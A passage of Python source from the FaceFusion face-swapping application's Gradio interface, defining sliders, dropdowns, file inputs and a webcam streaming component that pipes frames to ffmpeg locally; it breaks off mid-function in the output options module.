import Any, Dict, Tuple, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.face_store import clear_static_faces from facefusion.vision import count_video_frame_total from facefusion.filesystem import is_video from facefusion.uis.core import get_ui_components, register_ui_component TRIM_FRAME_START_SLIDER : Optional[gradio.Slider] = None TRIM_FRAME_END_SLIDER : Optional[gradio.Slider] = None def render() -> None: global TRIM_FRAME_START_SLIDER global TRIM_FRAME_END_SLIDER trim_frame_start_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.trim_frame_start_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } trim_frame_end_slider_args : Dict[str, Any] =\ { 'label': wording.get('uis.trim_frame_end_slider'), 'step': 1, 'minimum': 0, 'maximum': 100, 'visible': False } if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) trim_frame_start_slider_args['value'] = facefusion.globals.trim_frame_start or 0 trim_frame_start_slider_args['maximum'] = video_frame_total trim_frame_start_slider_args['visible'] = True trim_frame_end_slider_args['value'] = facefusion.globals.trim_frame_end or video_frame_total trim_frame_end_slider_args['maximum'] = video_frame_total trim_frame_end_slider_args['visible'] = True with gradio.Row(): TRIM_FRAME_START_SLIDER = gradio.Slider(**trim_frame_start_slider_args) TRIM_FRAME_END_SLIDER = gradio.Slider(**trim_frame_end_slider_args) register_ui_component('trim_frame_start_slider', TRIM_FRAME_START_SLIDER) register_ui_component('trim_frame_end_slider', TRIM_FRAME_END_SLIDER) def listen() -> None: TRIM_FRAME_START_SLIDER.release(update_trim_frame_start, inputs = TRIM_FRAME_START_SLIDER) TRIM_FRAME_END_SLIDER.release(update_trim_frame_end, inputs = TRIM_FRAME_END_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(remote_update, outputs = [ TRIM_FRAME_START_SLIDER, TRIM_FRAME_END_SLIDER ]) def remote_update() -> Tuple[gradio.Slider, gradio.Slider]: if is_video(facefusion.globals.target_path): video_frame_total = count_video_frame_total(facefusion.globals.target_path) facefusion.globals.trim_frame_start = None facefusion.globals.trim_frame_end = None return gradio.Slider(value = 0, maximum = video_frame_total, visible = True), gradio.Slider(value = video_frame_total, maximum = video_frame_total, visible = True) return gradio.Slider(value = None, maximum = None, visible = False), gradio.Slider(value = None, maximum = None, visible = False) def update_trim_frame_start(trim_frame_start : int) -> None: clear_static_faces() facefusion.globals.trim_frame_start = trim_frame_start if trim_frame_start > 0 else None def update_trim_frame_end(trim_frame_end : int) -> None: clear_static_faces() video_frame_total = count_video_frame_total(facefusion.globals.target_path) facefusion.globals.trim_frame_end = trim_frame_end if trim_frame_end < video_frame_total else None File: facefusion/uis/components/__init__.py File: facefusion/uis/components/about.py from typing import Optional import gradio from facefusion import metadata, wording ABOUT_BUTTON : Optional[gradio.HTML] = None DONATE_BUTTON : Optional[gradio.HTML] = None def render() -> None: global ABOUT_BUTTON global DONATE_BUTTON ABOUT_BUTTON = gradio.Button( value = metadata.get('name') + ' ' + metadata.get('version'), variant = 'primary', link = metadata.get('url') ) DONATE_BUTTON = 
gradio.Button( value = wording.get('uis.donate_button'), link = 'https://donate.facefusion.io', size = 'sm' ) File: facefusion/uis/components/execution_queue_count.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording EXECUTION_QUEUE_COUNT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global EXECUTION_QUEUE_COUNT_SLIDER EXECUTION_QUEUE_COUNT_SLIDER = gradio.Slider( label = wording.get('uis.execution_queue_count_slider'), value = facefusion.globals.execution_queue_count, step = facefusion.choices.execution_queue_count_range[1] - facefusion.choices.execution_queue_count_range[0], minimum = facefusion.choices.execution_queue_count_range[0], maximum = facefusion.choices.execution_queue_count_range[-1] ) def listen() -> None: EXECUTION_QUEUE_COUNT_SLIDER.release(update_execution_queue_count, inputs = EXECUTION_QUEUE_COUNT_SLIDER) def update_execution_queue_count(execution_queue_count : int = 1) -> None: facefusion.globals.execution_queue_count = execution_queue_count File: facefusion/uis/components/webcam.py from typing import Optional, Generator, Deque import os import subprocess import cv2 import gradio from time import sleep from concurrent.futures import ThreadPoolExecutor from collections import deque from tqdm import tqdm import facefusion.globals from facefusion import logger, wording from facefusion.audio import create_empty_audio_frame from facefusion.common_helper import is_windows from facefusion.content_analyser import analyse_stream from facefusion.filesystem import filter_image_paths from facefusion.typing import VisionFrame, Face, Fps from facefusion.face_analyser import get_average_face from facefusion.processors.frame.core import get_frame_processors_modules, load_frame_processor_module from facefusion.ffmpeg import open_ffmpeg from facefusion.vision import normalize_frame_color, read_static_images, unpack_resolution from facefusion.uis.typing import StreamMode, WebcamMode from facefusion.uis.core import get_ui_component, get_ui_components WEBCAM_CAPTURE : Optional[cv2.VideoCapture] = None WEBCAM_IMAGE : Optional[gradio.Image] = None WEBCAM_START_BUTTON : Optional[gradio.Button] = None WEBCAM_STOP_BUTTON : Optional[gradio.Button] = None def get_webcam_capture() -> Optional[cv2.VideoCapture]: global WEBCAM_CAPTURE if WEBCAM_CAPTURE is None: if is_windows(): webcam_capture = cv2.VideoCapture(0, cv2.CAP_DSHOW) else: webcam_capture = cv2.VideoCapture(0) if webcam_capture and webcam_capture.isOpened(): WEBCAM_CAPTURE = webcam_capture return WEBCAM_CAPTURE def clear_webcam_capture() -> None: global WEBCAM_CAPTURE if WEBCAM_CAPTURE: WEBCAM_CAPTURE.release() WEBCAM_CAPTURE = None def render() -> None: global WEBCAM_IMAGE global WEBCAM_START_BUTTON global WEBCAM_STOP_BUTTON WEBCAM_IMAGE = gradio.Image( label = wording.get('uis.webcam_image') ) WEBCAM_START_BUTTON = gradio.Button( value = wording.get('uis.start_button'), variant = 'primary', size = 'sm' ) WEBCAM_STOP_BUTTON = gradio.Button( value = wording.get('uis.stop_button'), size = 'sm' ) def listen() -> None: start_event = None webcam_mode_radio = get_ui_component('webcam_mode_radio') webcam_resolution_dropdown = get_ui_component('webcam_resolution_dropdown') webcam_fps_slider = get_ui_component('webcam_fps_slider') if webcam_mode_radio and webcam_resolution_dropdown and webcam_fps_slider: start_event = WEBCAM_START_BUTTON.click(start, inputs = [ webcam_mode_radio, webcam_resolution_dropdown, webcam_fps_slider ], outputs = WEBCAM_IMAGE) 
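# Illustrative sketch, not part of the facefusion sources: the submit-and-drain
# pattern at the core of multi_process_capture() below, with the webcam replaced
# by synthetic frames so it can run standalone.
from collections import deque
from concurrent.futures import ThreadPoolExecutor

import numpy

def example_process_frame(vision_frame):
    return vision_frame[:, :, ::-1]  # stand-in for the frame processor chain

example_frames = [ numpy.zeros((4, 4, 3), dtype = numpy.uint8) for _ in range(8) ]
example_results = deque()
with ThreadPoolExecutor(max_workers = 4) as executor:
    example_futures = [ executor.submit(example_process_frame, frame) for frame in example_frames ]
    for example_future in example_futures:
        example_results.append(example_future.result())
assert len(example_results) == 8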
WEBCAM_STOP_BUTTON.click(stop, cancels = start_event) for ui_component in get_ui_components( [ 'frame_processors_checkbox_group', 'face_swapper_model_dropdown', 'face_enhancer_model_dropdown', 'frame_enhancer_model_dropdown', 'lip_syncer_model_dropdown', 'source_image' ]): ui_component.change(update, cancels = start_event) def start(webcam_mode : WebcamMode, webcam_resolution : str, webcam_fps : Fps) -> Generator[VisionFrame, None, None]: facefusion.globals.face_selector_mode = 'one' facefusion.globals.face_analyser_order = 'large-small' source_image_paths = filter_image_paths(facefusion.globals.source_paths) source_frames = read_static_images(source_image_paths) source_face = get_average_face(source_frames) stream = None if webcam_mode in [ 'udp', 'v4l2' ]: stream = open_stream(webcam_mode, webcam_resolution, webcam_fps) #type:ignore[arg-type] webcam_width, webcam_height = unpack_resolution(webcam_resolution) webcam_capture = get_webcam_capture() if webcam_capture and webcam_capture.isOpened(): webcam_capture.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG')) #type:ignore[attr-defined] webcam_capture.set(cv2.CAP_PROP_FRAME_WIDTH, webcam_width) webcam_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, webcam_height) webcam_capture.set(cv2.CAP_PROP_FPS, webcam_fps) for capture_frame in multi_process_capture(source_face, webcam_capture, webcam_fps): if webcam_mode == 'inline': yield normalize_frame_color(capture_frame) else: try: stream.stdin.write(capture_frame.tobytes()) except Exception: clear_webcam_capture() yield None def multi_process_capture(source_face : Face, webcam_capture : cv2.VideoCapture, webcam_fps : Fps) -> Generator[VisionFrame, None, None]: with tqdm(desc = wording.get('processing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: with ThreadPoolExecutor(max_workers = facefusion.globals.execution_thread_count) as executor: futures = [] deque_capture_frames : Deque[VisionFrame] = deque() while webcam_capture and webcam_capture.isOpened(): _, capture_frame = webcam_capture.read() if analyse_stream(capture_frame, webcam_fps): return future = executor.submit(process_stream_frame, source_face, capture_frame) futures.append(future) for future_done in [ future for future in futures if future.done() ]: capture_frame = future_done.result() deque_capture_frames.append(capture_frame) futures.remove(future_done) while deque_capture_frames: progress.update() yield deque_capture_frames.popleft() def update() -> None: for frame_processor in facefusion.globals.frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) while not frame_processor_module.post_check(): logger.disable() sleep(0.5) logger.enable() def stop() -> gradio.Image: clear_webcam_capture() return gradio.Image(value = None) def process_stream_frame(source_face : Face, target_vision_frame : VisionFrame) -> VisionFrame: source_audio_frame = create_empty_audio_frame() for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): logger.disable() if frame_processor_module.pre_process('stream'): logger.enable() target_vision_frame = frame_processor_module.process_frame( { 'source_face': source_face, 'source_audio_frame': source_audio_frame, 'target_vision_frame': target_vision_frame }) return target_vision_frame def open_stream(stream_mode : StreamMode, stream_resolution : str, stream_fps : Fps) -> subprocess.Popen[bytes]: commands = [ '-f', 'rawvideo', '-pix_fmt', 'bgr24', '-s', stream_resolution, '-r', 
str(stream_fps), '-i', '-'] if stream_mode == 'udp': commands.extend([ '-b:v', '2000k', '-f', 'mpegts', 'udp://localhost:27000?pkt_size=1316' ]) if stream_mode == 'v4l2': try: device_name = os.listdir('/sys/devices/virtual/video4linux')[0] if device_name: commands.extend([ '-f', 'v4l2', '/dev/' + device_name ]) except FileNotFoundError: logger.error(wording.get('stream_not_loaded').format(stream_mode = stream_mode), __name__.upper()) return open_ffmpeg(commands) File: facefusion/uis/components/execution_thread_count.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording EXECUTION_THREAD_COUNT_SLIDER : Optional[gradio.Slider] = None def render() -> None: global EXECUTION_THREAD_COUNT_SLIDER EXECUTION_THREAD_COUNT_SLIDER = gradio.Slider( label = wording.get('uis.execution_thread_count_slider'), value = facefusion.globals.execution_thread_count, step = facefusion.choices.execution_thread_count_range[1] - facefusion.choices.execution_thread_count_range[0], minimum = facefusion.choices.execution_thread_count_range[0], maximum = facefusion.choices.execution_thread_count_range[-1] ) def listen() -> None: EXECUTION_THREAD_COUNT_SLIDER.release(update_execution_thread_count, inputs = EXECUTION_THREAD_COUNT_SLIDER) def update_execution_thread_count(execution_thread_count : int = 1) -> None: facefusion.globals.execution_thread_count = execution_thread_count File: facefusion/uis/components/face_selector.py from typing import List, Optional, Tuple, Any, Dict import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.face_store import clear_static_faces, clear_reference_faces from facefusion.vision import get_video_frame, read_static_image, normalize_frame_color from facefusion.filesystem import is_image, is_video from facefusion.face_analyser import get_many_faces from facefusion.typing import VisionFrame, FaceSelectorMode from facefusion.uis.core import get_ui_component, get_ui_components, register_ui_component FACE_SELECTOR_MODE_DROPDOWN : Optional[gradio.Dropdown] = None REFERENCE_FACE_POSITION_GALLERY : Optional[gradio.Gallery] = None REFERENCE_FACE_DISTANCE_SLIDER : Optional[gradio.Slider] = None def render() -> None: global FACE_SELECTOR_MODE_DROPDOWN global REFERENCE_FACE_POSITION_GALLERY global REFERENCE_FACE_DISTANCE_SLIDER reference_face_gallery_args : Dict[str, Any] =\ { 'label': wording.get('uis.reference_face_gallery'), 'object_fit': 'cover', 'columns': 8, 'allow_preview': False, 'visible': 'reference' in facefusion.globals.face_selector_mode } if is_image(facefusion.globals.target_path): reference_frame = read_static_image(facefusion.globals.target_path) reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) if is_video(facefusion.globals.target_path): reference_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) reference_face_gallery_args['value'] = extract_gallery_frames(reference_frame) FACE_SELECTOR_MODE_DROPDOWN = gradio.Dropdown( label = wording.get('uis.face_selector_mode_dropdown'), choices = facefusion.choices.face_selector_modes, value = facefusion.globals.face_selector_mode ) REFERENCE_FACE_POSITION_GALLERY = gradio.Gallery(**reference_face_gallery_args) REFERENCE_FACE_DISTANCE_SLIDER = gradio.Slider( label = wording.get('uis.reference_face_distance_slider'), value = facefusion.globals.reference_face_distance, step = facefusion.choices.reference_face_distance_range[1] - 
facefusion.choices.reference_face_distance_range[0], minimum = facefusion.choices.reference_face_distance_range[0], maximum = facefusion.choices.reference_face_distance_range[-1], visible = 'reference' in facefusion.globals.face_selector_mode ) register_ui_component('face_selector_mode_dropdown', FACE_SELECTOR_MODE_DROPDOWN) register_ui_component('reference_face_position_gallery', REFERENCE_FACE_POSITION_GALLERY) register_ui_component('reference_face_distance_slider', REFERENCE_FACE_DISTANCE_SLIDER) def listen() -> None: FACE_SELECTOR_MODE_DROPDOWN.change(update_face_selector_mode, inputs = FACE_SELECTOR_MODE_DROPDOWN, outputs = [ REFERENCE_FACE_POSITION_GALLERY, REFERENCE_FACE_DISTANCE_SLIDER ]) REFERENCE_FACE_POSITION_GALLERY.select(clear_and_update_reference_face_position) REFERENCE_FACE_DISTANCE_SLIDER.release(update_reference_face_distance, inputs = REFERENCE_FACE_DISTANCE_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(update_reference_face_position) getattr(ui_component, method)(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_analyser_order_dropdown', 'face_analyser_age_dropdown', 'face_analyser_gender_dropdown' ]): ui_component.change(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_detector_model_dropdown', 'face_detector_size_dropdown' ]): ui_component.change(clear_and_update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) for ui_component in get_ui_components( [ 'face_detector_score_slider', 'face_landmarker_score_slider' ]): ui_component.release(clear_and_update_reference_position_gallery, outputs=REFERENCE_FACE_POSITION_GALLERY) preview_frame_slider = get_ui_component('preview_frame_slider') if preview_frame_slider: preview_frame_slider.change(update_reference_frame_number, inputs = preview_frame_slider) preview_frame_slider.release(update_reference_position_gallery, outputs = REFERENCE_FACE_POSITION_GALLERY) def update_face_selector_mode(face_selector_mode : FaceSelectorMode) -> Tuple[gradio.Gallery, gradio.Slider]: if face_selector_mode == 'many': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = False), gradio.Slider(visible = False) if face_selector_mode == 'one': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = False), gradio.Slider(visible = False) if face_selector_mode == 'reference': facefusion.globals.face_selector_mode = face_selector_mode return gradio.Gallery(visible = True), gradio.Slider(visible = True) def clear_and_update_reference_face_position(event : gradio.SelectData) -> gradio.Gallery: clear_reference_faces() clear_static_faces() update_reference_face_position(event.index) return update_reference_position_gallery() def update_reference_face_position(reference_face_position : int = 0) -> None: facefusion.globals.reference_face_position = reference_face_position def update_reference_face_distance(reference_face_distance : float) -> None: facefusion.globals.reference_face_distance = reference_face_distance def update_reference_frame_number(reference_frame_number : int) -> None: facefusion.globals.reference_frame_number = reference_frame_number def clear_and_update_reference_position_gallery() -> gradio.Gallery: clear_reference_faces() clear_static_faces() return 
update_reference_position_gallery() def update_reference_position_gallery() -> gradio.Gallery: gallery_vision_frames = [] if is_image(facefusion.globals.target_path): temp_vision_frame = read_static_image(facefusion.globals.target_path) gallery_vision_frames = extract_gallery_frames(temp_vision_frame) if is_video(facefusion.globals.target_path): temp_vision_frame = get_video_frame(facefusion.globals.target_path, facefusion.globals.reference_frame_number) gallery_vision_frames = extract_gallery_frames(temp_vision_frame) if gallery_vision_frames: return gradio.Gallery(value = gallery_vision_frames) return gradio.Gallery(value = None) def extract_gallery_frames(temp_vision_frame : VisionFrame) -> List[VisionFrame]: gallery_vision_frames = [] faces = get_many_faces(temp_vision_frame) for face in faces: start_x, start_y, end_x, end_y = map(int, face.bounding_box) padding_x = int((end_x - start_x) * 0.25) padding_y = int((end_y - start_y) * 0.25) start_x = max(0, start_x - padding_x) start_y = max(0, start_y - padding_y) end_x = max(0, end_x + padding_x) end_y = max(0, end_y + padding_y) crop_vision_frame = temp_vision_frame[start_y:end_y, start_x:end_x] crop_vision_frame = normalize_frame_color(crop_vision_frame) gallery_vision_frames.append(crop_vision_frame) return gallery_vision_frames File: facefusion/uis/components/target.py from typing import Tuple, Optional import gradio import facefusion.globals from facefusion import wording from facefusion.face_store import clear_static_faces, clear_reference_faces from facefusion.uis.typing import File from facefusion.filesystem import get_file_size, is_image, is_video from facefusion.uis.core import register_ui_component from facefusion.vision import get_video_frame, normalize_frame_color FILE_SIZE_LIMIT = 512 * 1024 * 1024 TARGET_FILE : Optional[gradio.File] = None TARGET_IMAGE : Optional[gradio.Image] = None TARGET_VIDEO : Optional[gradio.Video] = None def render() -> None: global TARGET_FILE global TARGET_IMAGE global TARGET_VIDEO is_target_image = is_image(facefusion.globals.target_path) is_target_video = is_video(facefusion.globals.target_path) TARGET_FILE = gradio.File( label = wording.get('uis.target_file'), file_count = 'single', file_types = [ '.png', '.jpg', '.webp', '.webm', '.mp4' ], value = facefusion.globals.target_path if is_target_image or is_target_video else None ) target_image_args =\ { 'show_label': False, 'visible': False } target_video_args =\ { 'show_label': False, 'visible': False } if is_target_image: target_image_args['value'] = TARGET_FILE.value['name'] target_image_args['visible'] = True if is_target_video: if get_file_size(facefusion.globals.target_path) > FILE_SIZE_LIMIT: preview_vision_frame = normalize_frame_color(get_video_frame(facefusion.globals.target_path)) target_image_args['value'] = preview_vision_frame target_image_args['visible'] = True else: target_video_args['value'] = TARGET_FILE.value['name'] target_video_args['visible'] = True TARGET_IMAGE = gradio.Image(**target_image_args) TARGET_VIDEO = gradio.Video(**target_video_args) register_ui_component('target_image', TARGET_IMAGE) register_ui_component('target_video', TARGET_VIDEO) def listen() -> None: TARGET_FILE.change(update, inputs = TARGET_FILE, outputs = [ TARGET_IMAGE, TARGET_VIDEO ]) def update(file : File) -> Tuple[gradio.Image, gradio.Video]: clear_reference_faces() clear_static_faces() if file and is_image(file.name): facefusion.globals.target_path = file.name return gradio.Image(value = file.name, visible = True), gradio.Video(value = None, 
visible = False) if file and is_video(file.name): facefusion.globals.target_path = file.name if get_file_size(file.name) > FILE_SIZE_LIMIT: preview_vision_frame = normalize_frame_color(get_video_frame(file.name)) return gradio.Image(value = preview_vision_frame, visible = True), gradio.Video(value = None, visible = False) return gradio.Image(value = None, visible = False), gradio.Video(value = file.name, visible = True) facefusion.globals.target_path = None return gradio.Image(value = None, visible = False), gradio.Video(value = None, visible = False) File: facefusion/uis/components/temp_frame.py from typing import Optional import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import TempFrameFormat from facefusion.filesystem import is_video from facefusion.uis.core import get_ui_component TEMP_FRAME_FORMAT_DROPDOWN : Optional[gradio.Dropdown] = None def render() -> None: global TEMP_FRAME_FORMAT_DROPDOWN TEMP_FRAME_FORMAT_DROPDOWN = gradio.Dropdown( label = wording.get('uis.temp_frame_format_dropdown'), choices = facefusion.choices.temp_frame_formats, value = facefusion.globals.temp_frame_format, visible = is_video(facefusion.globals.target_path) ) def listen() -> None: TEMP_FRAME_FORMAT_DROPDOWN.change(update_temp_frame_format, inputs = TEMP_FRAME_FORMAT_DROPDOWN) target_video = get_ui_component('target_video') if target_video: for method in [ 'upload', 'change', 'clear' ]: getattr(target_video, method)(remote_update, outputs = TEMP_FRAME_FORMAT_DROPDOWN) def remote_update() -> gradio.Dropdown: if is_video(facefusion.globals.target_path): return gradio.Dropdown(visible = True) return gradio.Dropdown(visible = False) def update_temp_frame_format(temp_frame_format : TempFrameFormat) -> None: facefusion.globals.temp_frame_format = temp_frame_format File: facefusion/uis/components/benchmark_options.py from typing import Optional import gradio from facefusion import wording from facefusion.uis.core import register_ui_component from facefusion.uis.components.benchmark import BENCHMARKS BENCHMARK_RUNS_CHECKBOX_GROUP : Optional[gradio.CheckboxGroup] = None BENCHMARK_CYCLES_SLIDER : Optional[gradio.Button] = None def render() -> None: global BENCHMARK_RUNS_CHECKBOX_GROUP global BENCHMARK_CYCLES_SLIDER BENCHMARK_RUNS_CHECKBOX_GROUP = gradio.CheckboxGroup( label = wording.get('uis.benchmark_runs_checkbox_group'), value = list(BENCHMARKS.keys()), choices = list(BENCHMARKS.keys()) ) BENCHMARK_CYCLES_SLIDER = gradio.Slider( label = wording.get('uis.benchmark_cycles_slider'), value = 5, step = 1, minimum = 1, maximum = 10 ) register_ui_component('benchmark_runs_checkbox_group', BENCHMARK_RUNS_CHECKBOX_GROUP) register_ui_component('benchmark_cycles_slider', BENCHMARK_CYCLES_SLIDER) File: facefusion/uis/components/source.py from typing import Optional, List, Tuple import gradio import facefusion.globals from facefusion import wording from facefusion.uis.typing import File from facefusion.common_helper import get_first from facefusion.filesystem import has_audio, has_image, filter_audio_paths, filter_image_paths from facefusion.uis.core import register_ui_component SOURCE_FILE : Optional[gradio.File] = None SOURCE_AUDIO : Optional[gradio.Audio] = None SOURCE_IMAGE : Optional[gradio.Image] = None def render() -> None: global SOURCE_FILE global SOURCE_AUDIO global SOURCE_IMAGE has_source_audio = has_audio(facefusion.globals.source_paths) has_source_image = has_image(facefusion.globals.source_paths) SOURCE_FILE = gradio.File( file_count = 
'multiple', file_types = [ '.mp3', '.wav', '.png', '.jpg', '.webp' ], label = wording.get('uis.source_file'), value = facefusion.globals.source_paths if has_source_audio or has_source_image else None ) source_file_names = [ source_file_value['name'] for source_file_value in SOURCE_FILE.value ] if SOURCE_FILE.value else None source_audio_path = get_first(filter_audio_paths(source_file_names)) source_image_path = get_first(filter_image_paths(source_file_names)) SOURCE_AUDIO = gradio.Audio( value = source_audio_path if has_source_audio else None, visible = has_source_audio, show_label = False ) SOURCE_IMAGE = gradio.Image( value = source_image_path if has_source_image else None, visible = has_source_image, show_label = False ) register_ui_component('source_audio', SOURCE_AUDIO) register_ui_component('source_image', SOURCE_IMAGE) def listen() -> None: SOURCE_FILE.change(update, inputs = SOURCE_FILE, outputs = [ SOURCE_AUDIO, SOURCE_IMAGE ]) def update(files : List[File]) -> Tuple[gradio.Audio, gradio.Image]: file_names = [ file.name for file in files ] if files else None has_source_audio = has_audio(file_names) has_source_image = has_image(file_names) if has_source_audio or has_source_image: source_audio_path = get_first(filter_audio_paths(file_names)) source_image_path = get_first(filter_image_paths(file_names)) facefusion.globals.source_paths = file_names return gradio.Audio(value = source_audio_path, visible = has_source_audio), gradio.Image(value = source_image_path, visible = has_source_image) facefusion.globals.source_paths = None return gradio.Audio(value = None, visible = False), gradio.Image(value = None, visible = False) File: facefusion/uis/components/output_options.py from typing import Optional, Tuple import gradio import facefusion.globals import facefusion.choices from facefusion import wording from facefusion.typing import OutputVideoEncoder, OutputVideoPreset, Fps from facefusion.filesystem import is_image, is_video from facefusion.uis.core import get_ui_components, register_ui_component from facefusion.vision import detect_image_resolution, create_image_resolutions, detect_video_fps, detect_video_resolution, create_video_resolutions, pack_resolution OUTPUT_PATH_TEXTBOX : Optional[gradio.Textbox] = None OUTPUT_IMAGE_QUALITY_SLIDER : Optional[gradio.Slider] = None OUTPUT_IMAGE_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_ENCODER_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_PRESET_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_RESOLUTION_DROPDOWN : Optional[gradio.Dropdown] = None OUTPUT_VIDEO_QUALITY_SLIDER : Optional[gradio.Slider] = None OUTPUT_VIDEO_FPS_SLIDER : Optional[gradio.Slider] = None def render() -> None: global OUTPUT_PATH_TEXTBOX global OUTPUT_IMAGE_QUALITY_SLIDER global OUTPUT_IMAGE_RESOLUTION_DROPDOWN global OUTPUT_VIDEO_ENCODER_DROPDOWN global OUTPUT_VIDEO_PRESET_DROPDOWN global OUTPUT_VIDEO_RESOLUTION_DROPDOWN global OUTPUT_VIDEO_QUALITY_SLIDER global OUTPUT_VIDEO_FPS_SLIDER output_image_resolutions = [] output_video_resolutions = [] if is_image(facefusion.globals.target_path): output_image_resolution = detect_image_resolution(facefusion.globals.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) if is_video(facefusion.globals.target_path): output_video_resolution = detect_video_resolution(facefusion.globals.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) facefusion.globals.output_path = facefusion.globals.output_path or '.' 
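# The output path falls back to the current directory when nothing is configured, so the textbox below always starts with a usable value.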
OUTPUT_PATH_TEXTBOX = gradio.Textbox( label = wording.get('uis.output_path_textbox'), value = facefusion.globals.output_path, max_lines = 1 ) OUTPUT_IMAGE_QUALITY_SLIDER = gradio.Slider( label = wording.get('uis.output_image_quality_slider'), value = facefusion.globals.output_image_quality, step = facefusion.choices.output_image_quality_range[1] - facefusion.choices.output_image_quality_range[0], minimum = facefusion.choices.output_image_quality_range[0], maximum = facefusion.choices.output_image_quality_range[-1], visible = is_image(facefusion.globals.target_path) ) OUTPUT_IMAGE_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_image_resolution_dropdown'), choices = output_image_resolutions, value = facefusion.globals.output_image_resolution, visible = is_image(facefusion.globals.target_path) ) OUTPUT_VIDEO_ENCODER_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_encoder_dropdown'), choices = facefusion.choices.output_video_encoders, value = facefusion.globals.output_video_encoder, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_PRESET_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_preset_dropdown'), choices = facefusion.choices.output_video_presets, value = facefusion.globals.output_video_preset, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_QUALITY_SLIDER = gradio.Slider( label = wording.get('uis.output_video_quality_slider'), value = facefusion.globals.output_video_quality, step = facefusion.choices.output_video_quality_range[1] - facefusion.choices.output_video_quality_range[0], minimum = facefusion.choices.output_video_quality_range[0], maximum = facefusion.choices.output_video_quality_range[-1], visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_RESOLUTION_DROPDOWN = gradio.Dropdown( label = wording.get('uis.output_video_resolution_dropdown'), choices = output_video_resolutions, value = facefusion.globals.output_video_resolution, visible = is_video(facefusion.globals.target_path) ) OUTPUT_VIDEO_FPS_SLIDER = gradio.Slider( label = wording.get('uis.output_video_fps_slider'), value = facefusion.globals.output_video_fps, step = 0.01, minimum = 1, maximum = 60, visible = is_video(facefusion.globals.target_path) ) register_ui_component('output_path_textbox', OUTPUT_PATH_TEXTBOX) register_ui_component('output_video_fps_slider', OUTPUT_VIDEO_FPS_SLIDER) def listen() -> None: OUTPUT_PATH_TEXTBOX.change(update_output_path, inputs = OUTPUT_PATH_TEXTBOX) OUTPUT_IMAGE_QUALITY_SLIDER.release(update_output_image_quality, inputs = OUTPUT_IMAGE_QUALITY_SLIDER) OUTPUT_IMAGE_RESOLUTION_DROPDOWN.change(update_output_image_resolution, inputs = OUTPUT_IMAGE_RESOLUTION_DROPDOWN) OUTPUT_VIDEO_ENCODER_DROPDOWN.change(update_output_video_encoder, inputs = OUTPUT_VIDEO_ENCODER_DROPDOWN) OUTPUT_VIDEO_PRESET_DROPDOWN.change(update_output_video_preset, inputs = OUTPUT_VIDEO_PRESET_DROPDOWN) OUTPUT_VIDEO_QUALITY_SLIDER.release(update_output_video_quality, inputs = OUTPUT_VIDEO_QUALITY_SLIDER) OUTPUT_VIDEO_RESOLUTION_DROPDOWN.change(update_output_video_resolution, inputs = OUTPUT_VIDEO_RESOLUTION_DROPDOWN) OUTPUT_VIDEO_FPS_SLIDER.release(update_output_video_fps, inputs = OUTPUT_VIDEO_FPS_SLIDER) for ui_component in get_ui_components( [ 'target_image', 'target_video' ]): for method in [ 'upload', 'change', 'clear' ]: getattr(ui_component, method)(remote_update, outputs = [ OUTPUT_IMAGE_QUALITY_SLIDER, OUTPUT_IMAGE_RESOLUTION_DROPDOWN, OUTPUT_VIDEO_ENCODER_DROPDOWN, OUTPUT_VIDEO_PRESET_DROPDOWN, 
OUTPUT_VIDEO_QUALITY_SLIDER, OUTPUT_VIDEO_RESOLUTION_DROPDOWN, OUTPUT_VIDEO_FPS_SLIDER ]) def remote_update() -> Tuple[gradio.Slider, gradio.Dropdown, gradio.Dropdown, gradio.Dropdown, gradio.Slider, gradio.Dropdown, gradio.Slider]: if is_image(facefusion.globals.target_path): output_image_resolution = detect_image_resolution(facefusion.globals.target_path) output_image_resolutions = create_image_resolutions(output_image_resolution) facefusion.globals.output_image_resolution = pack_resolution(output_image_resolution) return gradio.Slider(visible = True), gradio.Dropdown(visible = True, value = facefusion.globals.output_image_resolution, choices = output_image_resolutions), gradio.Dropdown(visible = False), gradio.Dropdown(visible = False), gradio.Slider(visible = False), gradio.Dropdown(visible = False, value = None, choices = None), gradio.Slider(visible = False, value = None) if is_video(facefusion.globals.target_path): output_video_resolution = detect_video_resolution(facefusion.globals.target_path) output_video_resolutions = create_video_resolutions(output_video_resolution) 